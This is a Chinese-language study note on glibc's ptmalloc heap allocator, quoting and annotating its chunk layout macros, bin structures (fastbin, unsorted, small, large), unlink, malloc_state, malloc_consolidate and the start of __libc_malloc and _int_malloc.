不可视境界线最后变动于：2023年3月24日晚上

基本数据结构及函数

管理chunk

Size and alignment `checks` and conversions

/* conversion from malloc headers to user pointers, and back */
#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
/* The smallest possible chunk */
#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
/* The smallest size we can malloc is an aligned minimal chunk */
#define MINSIZE  \
  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
/* Check if m has acceptable alignment */
#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
#define misaligned_chunk(p) \
  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
   & MALLOC_ALIGN_MASK)
/*
   Check if a request is so large that it would wrap around zero when
   padded and aligned. To simplify some other code, the bound is made
   low enough so that adding MINSIZE will also not wrap around zero.
 */
#define REQUEST_OUT_OF_RANGE(req)                                 \
  ((unsigned long) (req) >=                                                      \
   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
/* pad request bytes into a usable size -- internal version */
#define request2size(req)                                         \
  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
   MINSIZE :                                                      \
   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
/* Same, except also perform an argument and result check.  First, we check
   that the padding done by request2size didn't result in an integer
   overflow.  Then we check (using REQUEST_OUT_OF_RANGE) that the resulting
   size isn't so large that a later alignment would lead to another integer
   overflow.  */
#define checked_request2size(req, sz) \
({                                    \
  (sz) = request2size (req);            \
  if (((sz) < (req))                    \
      || REQUEST_OUT_OF_RANGE (sz)) \
    {                                    \
      __set_errno (ENOMEM);            \
      return 0;                            \
    }                                    \
})

malloc_chunk

/*  chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Size of previous chunk, if unallocated (P clear)  |
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Size of chunk, in bytes                     |A|M|P|
      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             User data starts here...                          .
            .                                                               .
            .             (malloc_usable_size() bytes)                      .
            .                                                               |
nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             (size of chunk, but used for application data)    |
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Size of next chunk, in bytes                |A|0|1|
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ */
struct malloc_chunk {
  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
  struct malloc_chunk* fd;         /* double links -- used only if free. */
  struct malloc_chunk* bk;
  /* Only used for large blocks: pointer to next larger size.  */
  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
  struct malloc_chunk* bk_nextsize;
};

MALLOC_ALIGNMENT在32和64位机上分别为8和16字节, 被定义为2 * SIZE_SZ 和 __alignof__ (long double)中的较大者.
MALLOC_ALIGN_MASK定义为MALLOC_ALIGNMENT - 1, 在64位上是0b1111.
MIN_CHUNK_SIZE是fd_nextsize指针之前的部分.
MINSIZE = (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)) 即可完成块大小的16位对齐.

这样, 在64位系统上MINSIZE就是32(0x20)字节.

tips: # define INTERNAL_SIZE_T size_t 分别为4或8字节

chunk operations

没啥特别的, 如果有需要的话随时查找即可

/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
#define PREV_INUSE 0x1
/* extract inuse bit of previous chunk */
#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
#define IS_MMAPPED 0x2
/* check for mmap()'ed chunk */
#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
   from a non-main arena.  This is only set immediately before handing
   the chunk to the user, if necessary.  */
#define NON_MAIN_ARENA 0x4
/* Check for chunk from main arena.  */
#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
/* Mark a chunk as not being on the main arena.  */
#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
/*
   Bits to mask off when extracting size
   Note: IS_MMAPPED is intentionally not masked off from size field in
   macros for which mmapped chunks should never be seen. This should
   cause helpful core dumps to occur if it is tried by accident by
   people extending or adapting this malloc.
 */
#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
/* Get size, ignoring use bits */
#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
/* Like chunksize, but do not mask SIZE_BITS.  */
#define chunksize_nomask(p)         ((p)->mchunk_size)
/* Ptr to next physical malloc_chunk. */
#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
/* Size of the chunk below P.  Only valid if !prev_inuse (P).  */
#define prev_size(p) ((p)->mchunk_prev_size)
/* Set the size of the chunk below P.  Only valid if !prev_inuse (P).  */
#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
/* Ptr to previous physical malloc_chunk.  Only valid if !prev_inuse (P).  */
#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
/* Treat space at ptr + offset as a chunk */
#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
/* extract p's inuse bit */
#define inuse(p)                                                              \
  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
/* set/clear chunk as being inuse without otherwise disturbing */
#define set_inuse(p)                                                              \
  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
#define clear_inuse(p)                                                              \
  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
/* check/set/clear inuse bits in known places */
#define inuse_bit_at_offset(p, s)                                              \
  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
#define set_inuse_bit_at_offset(p, s)                                              \
  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
#define clear_inuse_bit_at_offset(p, s)                                              \
  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
/* Set size at head, without disturbing its use bit */
#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
/* Set size/use field */
#define set_head(p, s)       ((p)->mchunk_size = (s))
/* Set size at footer (only when chunk is not in use) */
#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))

Bin

在malloc_state中的存储

struct malloc_state
{
/* Fastbins */
mfastbinptr fastbinsY[NFASTBINS];
/* Normal bins packed as described above */
mchunkptr bins[NBINS * 2 - 2];
};

bin数组定位+大小

#define NBINS             128	//bin链长度
/* addressing -- note that bin_at(0) does not exist, *//*Bin 1 is the unordered list*/
#define bin_at(m, i) \
  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))                              \
             - offsetof (struct malloc_chunk, fd))  
/* analog of ++bin */
#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
/* Reminders about list directionality within bins */
#define first(b)     ((b)->fd)
#define last(b)      ((b)->bk)

bin_at的神奇操作:
- 对外部而言, bin数组应该为128个, 输入的下标也是如此, 到了内部将其转换为该位置chunk的fd指针, 取地址”&”, 转换为单字节指针char *, 然后减去chunk head的字节数, 变为该chunk的头部, 注意到chunk中只有fd和bk域有意义, 其余部分属于上一个bin头结点.
- 除了外部下标到内部下标的转换, 其余步骤相当于mem2chunk()的结果
为什么是乘以2呢?

因为每个bin链在bins数组中存储的是一个fd指针和一个bk指针，即两个malloc chunk指针，所以要NBINS * 2
又因为数组bins中索引为0、1的指针是不使用的，所以要减去2

例： bins[2]为unsorted bin链的fd成员，bin[3]为其bk成员, bin[0]为其presize, bin[1]为其size

unlink：从bins中取出chunk

发生在调用free时合并chunk的时候. 被合并的chunk被unlink出来.
2.25中unlink为宏定义, 2.26为unlink_chunk函数, 仅仅多了一个检查
- if (chunksize (p) != prev_size (next_chunk (p))) malloc_printerr ("corrupted size vs. prev_size");

/* Take a chunk off a bin list *///省略了每行末尾的反斜杠
#define unlink(AV, P, BK, FD) 
{ //例子unlink(av, victim, bck, fwd)
    FD = P->fd;//取出victim的fd和bk指针
    BK = P->bk;
	//例行检查,实际上就是如果victim没有完整的在链表中的话就报错
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
      malloc_printerr (check_action, "corrupted double-linked list", P, AV);
    else {//如果正常的话
        FD->bk = BK;
        BK->fd = FD; //取出了victim
        if (!in_smallbin_range (chunksize_nomask (P)) && __builtin_expect (P->fd_nextsize != NULL, 0)) 
        {//如果在largebin里的链表 且 在chunk size链表里则需要额外设置fd_nextsize和bk_nextsize
            //简单的检查, victim是不是 *完整的* 在chunk size链表
	        if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)
			|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))
	      	malloc_printerr (check_action, "corrupted double-linked list (not small)", P, AV);
            if (FD->fd_nextsize == NULL) {//FD和victim同样大小
                if (P->fd_nextsize == P)//fd_nextsize等于自身只能说明链表里只有这个大小
                  //现在就剩下FD(后面或许还有等大的)了, 修改一下chunk size链表
                  FD->fd_nextsize = FD->bk_nextsize = FD;
                else {//链表里还有其他的chunk
                    FD->fd_nextsize = P->fd_nextsize;
                    FD->bk_nextsize = P->bk_nextsize;
                    P->fd_nextsize->bk_nextsize = FD;
                    P->bk_nextsize->fd_nextsi  ze = FD;
                  }
            } else {//victim是一个单独的chunk
                P->fd_nextsize->bk_nextsize = P->bk_nextsize;
                P->bk_nextsize->fd_nextsize = P->fd_nextsize;
            }
        }
    }
}

fastbin

相关介绍和特点

/*
   Fastbins
    An array of lists holding recently freed small chunks.  Fastbins
    are not doubly linked.  It is faster to single-link them, and
    since chunks are never removed from the middles of these lists,
    double linking is not necessary. Also, unlike regular bins, they
    are not even processed in FIFO order (they use faster LIFO) since
    ordering doesn't much matter in the transient contexts in which
    fastbins are normally used.
    Chunks in fastbins keep their inuse bit set, so they cannot
    be consolidated with other free chunks. malloc_consolidate
    releases all chunks in fastbins and consolidates them with
    other free chunks.
 */
- 使用LIFO, 在链表头执行取出插入操作
- PREV_INUSE总为1, 不会和相邻块进行合并
- chunk从不会在链表中间被删去, 只需要单向链表即可

indexing

typedef struct malloc_chunk *mfastbinptr;
#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
/* offset 2 to use otherwise unindexable first 2 bins */
#define fastbin_index(sz) \
  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)

从fastbin_index方法也可以看出fastbin是将chunk大小转换为数据空间大小来index的, 从最短的8字节到80字节(默认64字节), 实际上支持(80 * SIZE_SZ / 4)字节

数量和容量

_int_malloc中判断chunk是否在fastbin范围内使用的是get_max_fast()函数, 返回的是global_max_fast变量, 在malloc_init_state()中调用set_max_fast(DEFAULT_MXFAST)初始化为128.

也就是说fastbin的范围是0x20-0x80.

/* The maximum fastbin request size we support */
//	    DEFAULT_MXFAST     64 (for 32bit), 128 (for 64bit)
#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
#define set_max_fast(s) \
  global_max_fast = (((s) == 0)                                                      \
                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))

/*
   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
   that triggers automatic consolidation of possibly-surrounding
   fastbin chunks. This is a heuristic, so the exact value should not
   matter too much. It is defined at half the default trim threshold as a
   compromise heuristic to only attempt consolidation if it is likely
   to lead to trimming. However, it is not dynamically tunable, since
   consolidation reduces fragmentation surrounding large chunks even
   if trimming is not used.
 */
#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)

unsorted bin

unsorted bin在bin数组中下标为1的位置(0无意义)

1 2	`/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */ #define unsorted_chunks(M) (bin_at (M, 1))`

small bin

#define NSMALLBINS         64
#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT //32为8, 64为16
#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ) //暂时不知道这是做啥的, 一般为0
#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH) //32:512  64:1024
#define in_smallbin_range(sz)  \
  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
#define smallbin_index(sz) \
  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
   + SMALLBIN_CORRECTION)

可以看到MIN_LARGE_SIZE用作了判断块大小是否位于small bin的范围内
small bin 紧跟在unsorted bin之后, 索引从2-63, 大小从(0x20-0x3f0, 注意这是chunk的指针), 所以index只需要移位就可以了, 相邻下标之间块大小间隔0x10(64), 0x8(32)
small bin和fast bin有一部分范围是重合的
FILO 链头入链尾出

large bin

#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
#define largebin_index_32(sz)                                                \
  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
   126)
#define largebin_index_32_big(sz)                                            \
  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
   126)
#define largebin_index_64(sz)                                                \
  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
   126)
#define largebin_index(sz) \
  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
   : largebin_index_32 (sz))

0x400-0xc30 : idx=64-96, 间隔0x40
0xc40-0x29f0: idx=97- , 间隔0x200
….
从链头(最左边) 到链尾，沿着各个chunk的fd指针，chunks由大到小，依次排序
- fd_nextsize 指向右一个小于当前 chunk 的第一个空闲块，不包含 bin 的头节点。
- bk_nextsize 指向左一个大于当前 chunk 的第一个空闲块，不包含 bin 的头节点。
- large bin结构:

Top

/*
   Top
    The top-most available chunk (i.e., the one bordering the end of
    available memory) is treated specially. It is never included in
    any bin, is used only if no other chunk is available, and is
    released back to the system if it is very large (see
    M_TRIM_THRESHOLD).  Because top initially
    points to its own bin with initial zero size, thus forcing
    extension on the first malloc request, we avoid having any special
    code in malloc to check whether it even exists yet. But we still
    need to do so when getting memory from system, so we make
    initial_top treat the bin as a legal but unusable chunk during the
    interval between initialization and the first call to
    sysmalloc. (This is somewhat delicate, since it relies on
    the 2 preceding words to be zero during this interval as well.)
 */
/* Conveniently, the unsorted bin can be used as dummy top on first call */
#define initial_top(M)              (unsorted_chunks (M))

总的index

graph LR
g([bin_index])-->a(smallbin_index) & b(largebin_index)
b-->|64|largebin_index_64
b-->|32 & MALLOC_ALIGNMENT == 16|m[largebin_index_32_big]
b-->|32 & != 16|largebin_index_32

核心结构体

malloc_state

struct malloc_state
{
  /* Serialize access.  */
  __libc_lock_define (, mutex);
  /* Flags (formerly in max_fast).  */
  int flags;
  /* Set if the fastbin chunks contain recently inserted free blocks.  */
  /* Note this is a bool but not all targets support atomics on booleans.  */
  int have_fastchunks;   //have_fastchunks是glibc 2.27 及以后特有的, 四字节32位可用
  /* Fastbins */
  mfastbinptr fastbinsY[NFASTBINS];
  /* Base of the topmost chunk -- not otherwise kept in a bin */
  mchunkptr top;
  /* The remainder from the most recent split of a small request */
  mchunkptr last_remainder;
  /* Normal bins packed as described above */
  mchunkptr bins[NBINS * 2 - 2];
  /* Bitmap of bins */
  unsigned int binmap[BINMAPSIZE];
  /* Linked list */
  struct malloc_state *next;
  /* Linked list for free arenas.  Access to this field is serialized
     by free_list_lock in arena.c.  */
  struct malloc_state *next_free;
  /* Number of threads attached to this arena.  0 if the arena is on
     the free list.  Access to this field is serialized by
     free_list_lock in arena.c.  */
  INTERNAL_SIZE_T attached_threads;
  /* Memory allocated from the system in this arena.  */
  INTERNAL_SIZE_T system_mem;
  INTERNAL_SIZE_T max_system_mem;
};

flags

/*
   FASTCHUNKS_BIT held in max_fast indicates that there are probably
   some fastbin chunks. It is set true on entering a chunk into any
   fastbin, and cleared only in malloc_consolidate.

   The truth value is inverted so that have_fastchunks will be true
   upon startup (since statics are zero-filled), simplifying
   initialization checks.
 */

#define FASTCHUNKS_BIT        (1U)

#define have_fastchunks(M)     (((M)->flags & FASTCHUNKS_BIT) == 0)
#define clear_fastchunks(M)    catomic_or (&(M)->flags, FASTCHUNKS_BIT)
#define set_fastchunks(M)      catomic_and (&(M)->flags, ~FASTCHUNKS_BIT)

Binmap

/*
   Binmap
    To help compensate for the large number of bins, a one-level index
    structure is used for bin-by-bin searching.  `binmap' is a
    bitvector recording whether bins are definitely empty so they can
    be skipped over during during traversals.  The bits are NOT always
    cleared as soon as bins are empty, but instead only
    when they are noticed to be empty during traversal in malloc.
 */
/* Conservatively use 32 bits per map word, even if on 64bit system */
#define BINMAPSHIFT      5
#define BITSPERMAP       (1U << BINMAPSHIFT)
#define BINMAPSIZE       (NBINS / BITSPERMAP)//32 bits per map word,every bit is useful
#define idx2block(i)     ((i) >> BINMAPSHIFT)//第6位及以后确定block
#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))//i & 31:取出低5位决定在block中的bit
#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))

malloc_par

struct malloc_par //malloc parameter, 堆管理器的相关参数
{
  /* Tunable parameters */
  unsigned long trim_threshold;
  INTERNAL_SIZE_T top_pad;
  INTERNAL_SIZE_T mmap_threshold;
  INTERNAL_SIZE_T arena_test;
  INTERNAL_SIZE_T arena_max;

  /* Memory map support */
  int n_mmaps;
  int n_mmaps_max;
  int max_n_mmaps;
  /* the mmap_threshold is dynamic, until the user sets
     it manually, at which point we need to disable any
     dynamic behavior. */
  int no_dyn_threshold;

  /* Statistics */
  INTERNAL_SIZE_T mmapped_mem;
  INTERNAL_SIZE_T max_mmapped_mem;

  /* First address handed out by MORECORE/sbrk.  */
  char *sbrk_base;

#if USE_TCACHE
  /* Maximum number of buckets to use.  */
  size_t tcache_bins;
  size_t tcache_max_bytes;
  /* Maximum number of chunks in each bucket.  */
  size_t tcache_count;
  /* Maximum number of chunks to remove from the unsorted list, which
     aren't used to prefill the cache.  */
  size_t tcache_unsorted_limit;
#endif
};

当每个分配区的 top chunk 大小大于trim_threshold时，在一定的条件下，调用 free 时会收缩内存，减小 top chunk 的大小。
top_pad 字段表示在分配内存时是否添加额外的 pad，默认该字段为 0。
mmap_threshold 字段表示 mmap 分配阈值，默认值为 128KB，在 32 位系统上最大值为 512KB，64 位系统上的最大值为 32MB，由于默认开启 mmap 分配阈值动态调整，该字段的值会动态修改，但不会超过最大值。
arena_test 和 arena_max 用于 PER_THREAD 优化，在 32 位系统上 arena_test 默认值为 2， 64 位系统上的默认值为 8，当每个进程的分配区数量小于等于 arena_test 时，不会重用已有的分配区。为了限制分配区的总数，用 arena_max 来保存分配区的最大数量，当系统中的分配区数量达到 arena_max，就不会再创建新的分配区，只会重用已有的分配区。这两个字段都可以使用 mallopt()函数设置。
n_mmaps 字段表示当前进程使用 mmap()函数分配的内存块的个数。
n_mmaps_max 字段表示进程使用 mmap()函数分配的内存块的最大数量，默认值为65536，可以使用 mallopt()函数修改
max_n_mmaps 字段表示当前进程使用 mmap()函数分配的内存块的数量的最大值，有关系 n_mmaps <= max_n_mmaps 成立。这个字段是由于 mstats()函数输出统计需要这个字段。
no_dyn_threshold 字段表示是否开启 mmap 分配阈值动态调整机制，默认值为 0，也就是默认开启 mmap 分配阈值动态调整机制。
pagesize 字段表示系统的页大小，默认为 4KB。
mmapped_mem 和 max_mmapped_mem 都用于统计 mmap 分配的内存大小，一般情况下两个字段的值相等，max_mmapped_mem 用于 mstats()函数。
max_total_mem 字段在单线程情况下用于统计进程分配的内存总数。
sbrk_base 字段表示堆的起始地址。

main_arena

static struct malloc_state main_arena = //main_arena是一个里libc中的全局静态变量
{
  .mutex = _LIBC_LOCK_INITIALIZER,
  .next = &main_arena,
  .attached_threads = 1
};

mp_

/* There is only one instance of the malloc parameters.  */

static struct malloc_par mp_ =
{
  .top_pad = DEFAULT_TOP_PAD,
  .n_mmaps_max = DEFAULT_MMAP_MAX,
  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
  .arena_test = NARENAS_FROM_NCORES (1)
#if USE_TCACHE
  ,
  .tcache_count = TCACHE_FILL_COUNT,
  .tcache_bins = TCACHE_MAX_BINS,
  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
  .tcache_unsorted_limit = 0 /* No limit.  */
#endif
};

设置了top_pad为 0
设置了n_maps_max为 65535
设置了mmap_threshold为 128 * 1024
设置了trim_threshold为 128 * 1024
设置了arena_test在gcc中32下为2，64位下为8（不同的编译器中long的长度可能不同，这里仅以gcc为例）

malloc_consolidate

/*
  ------------------------- malloc_consolidate -------------------------

  malloc_consolidate is a specialized version of free() that tears
  down chunks held in fastbins.  Free itself cannot be used for this
  purpose since, among other things, it might place chunks back onto
  fastbins.  So, instead, we need to use a minor variant of the same
  code.

  Also, because this routine needs to be called the first time through
  malloc anyway, it turns out to be the perfect place to trigger
  initialization code.
*/

static void malloc_consolidate(mstate av)
{
  mfastbinptr*    fb;                 /* current fastbin being consolidated */
  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
  mchunkptr       p;                  /* current chunk being consolidated */
  mchunkptr       nextp;              /* next chunk to consolidate */
  mchunkptr       unsorted_bin;       /* bin header */
  mchunkptr       first_unsorted;     /* chunk to link to */

  /* These have same use as in free() */
  mchunkptr       nextchunk;
  INTERNAL_SIZE_T size;
  INTERNAL_SIZE_T nextsize;
  INTERNAL_SIZE_T prevsize;
  int             nextinuse;
  mchunkptr       bck;
  mchunkptr       fwd;

    /*
      If max_fast is 0, we know that av hasn't
      yet been initialized, in which case do so below
    */
    // 说明 fastbin 已经初始化
    if (get_max_fast() != 0) {
        // 清空 fastbin 标记
        // 因为要合并 fastbin 中的 chunk 了。
        clear_fastchunks(av);
        //
        unsorted_bin = unsorted_chunks(av);

        /*
          Remove each chunk from fast bin and consolidate it, placing it
          then in unsorted bin. Among other reasons for doing this,
          placing in unsorted bin avoids needing to calculate actual bins
          until malloc is sure that chunks aren't immediately going to be
          reused anyway.
        */
        // 按照 fd 顺序遍历 fastbin 的每一个 bin，将 bin 中的每一个 chunk 合并掉。
        maxfb = &fastbin(av, NFASTBINS - 1);
        fb    = &fastbin(av, 0);
        do {
            p = atomic_exchange_acq(fb, NULL);
            if (p != 0) {
                do {
                    check_inuse_chunk(av, p);
                    nextp = p->fd;

                    /* Slightly streamlined version of consolidation code in
                     * free() */
                    size      = chunksize(p);
                    nextchunk = chunk_at_offset(p, size);
                    nextsize  = chunksize(nextchunk);

                    if (!prev_inuse(p)) {	//p的前一块空闲马上取出, 计算合并后大小
                        prevsize = prev_size(p);
                        size += prevsize;
                        p = chunk_at_offset(p, -((long) prevsize));
                        unlink(av, p, bck, fwd);
                    }

                    if (nextchunk != av->top) { 
                        // 判断 nextchunk 是否是空闲的。
                        nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

                        if (!nextinuse) { //p的后一块空闲马上取出, 计算合并后大小
                            size += nextsize;
                            unlink(av, nextchunk, bck, fwd);
                        } else
                         // 设置 nextchunk 的 prev inuse 为0，以表明可以合并当前 fast chunk。
                            clear_inuse_bit_at_offset(nextchunk, 0);
                        
                        //插入unsorted bin的常规操作
                        first_unsorted     = unsorted_bin->fd;
                        unsorted_bin->fd   = p;
                        first_unsorted->bk = p;

                        if (!in_smallbin_range(size)) {
                            p->fd_nextsize = NULL;
                            p->bk_nextsize = NULL;
                        }

                        set_head(p, size | PREV_INUSE);
                        p->bk = unsorted_bin;
                        p->fd = first_unsorted;
                        set_foot(p, size);
                    }
                    else { //直接和top chunk合并
                        size += nextsize;
                        set_head(p, size | PREV_INUSE);
                        av->top = p;
                    }

                } while ((p = nextp) != 0);
            }
        } while (fb++ != maxfb);
  }
  else { //如果还没有初始化
    malloc_init_state(av);
    check_malloc_state(av);
  }
}

malloc_init_state

/*
   Initialize a malloc_state struct.
   This is called from ptmalloc_init () or from _int_new_arena ()
   when creating a new arena.
 */
static void
malloc_init_state(mstate av)
{
    int i;
    mbinptr bin;
    /* Establish circular links for normal bins */
    for (i = 1; i < NBINS; ++i)
    {
        bin = bin_at(av, i);
        bin->fd = bin->bk = bin; //初始化, 把所有指针都指向自己
    }
#if MORECORE_CONTIGUOUS
    if (av != &main_arena)
#endif
        set_noncontiguous(av);
    if (av == &main_arena)
        set_max_fast(DEFAULT_MXFAST);
    //2.26, 一个arena在默认情况下并不拥有fastbin chunk
    atomic_store_relaxed(&av->have_fastchunks, false);
    //2.25:
    av->flags |= FASTCHUNKS_BIT;
    //将该areva的top chunk指针指向unsorted bin，用以表示初始时top chunk大小为0
    av->top = initial_top(av);
}

申请内存块

–libc-malloc

//这只是一个_int_malloc函数的简单wrapper
void * __libc_malloc (size_t bytes)
{
  mstate ar_ptr;
  void *victim;
  // 检查是否有内存分配钩子，如果有，调用钩子并返回.
  void *(*hook) (size_t, const void *)
    = atomic_forced_read (__malloc_hook);
  if (__builtin_expect (hook != NULL, 0))
    return (*hook)(bytes, RETURN_ADDRESS (0));
    
#if USE_TCACHE
  /* int_free also calls request2size, be careful to not pad twice.  */
  size_t tbytes = request2size (bytes);
  size_t tc_idx = csize2tidx (tbytes);

  MAYBE_INIT_TCACHE ();

  DIAG_PUSH_NEEDS_COMMENT;
  if (tc_idx < mp_.tcache_bins
      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
      && tcache
      && tcache->entries[tc_idx] != NULL)
    {
      return tcache_get (tc_idx);
    }
  DIAG_POP_NEEDS_COMMENT;
#endif
    
  //接着会寻找一个 arena 来试图分配内存
  arena_get (ar_ptr, bytes);
  //然后调用 _int_malloc 函数去申请对应的内存
  victim = _int_malloc (ar_ptr, bytes);
  /* Retry with another arena only if we were able to find a usable arena
     before.  */
  if (!victim && ar_ptr != NULL)
    {//如果分配失败的话，ptmalloc 会尝试再去寻找一个可用的 arena，并分配内存
      LIBC_PROBE (memory_malloc_retry, 1, bytes);
      ar_ptr = arena_get_retry (ar_ptr, bytes);
      victim = _int_malloc (ar_ptr, bytes);
    }

  if (ar_ptr != NULL)	//如果申请到了 arena，那么在退出之前还得解锁
    __libc_lock_unlock (ar_ptr->mutex);
  //要么没有申请到内存
  //要么是 mmap 的内存
  //要么申请到的内存必须在其所分配的 arena 中
  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
          ar_ptr == arena_for_chunk (mem2chunk (victim)));
  //最后返回内存
  return victim;
}

_int_malloc(非常之长)

1	`static void * _int_malloc (mstate av, size_t bytes)`

变量定义

  INTERNAL_SIZE_T nb;               /* normalized request size */
  unsigned int idx;                 /* associated bin index */
  mbinptr bin;                      /* associated bin */
  mchunkptr victim;                 /* inspected/selected chunk */
  INTERNAL_SIZE_T size;             /* its size */
  int victim_index;                 /* its bin index */
  mchunkptr remainder;              /* remainder from a split */
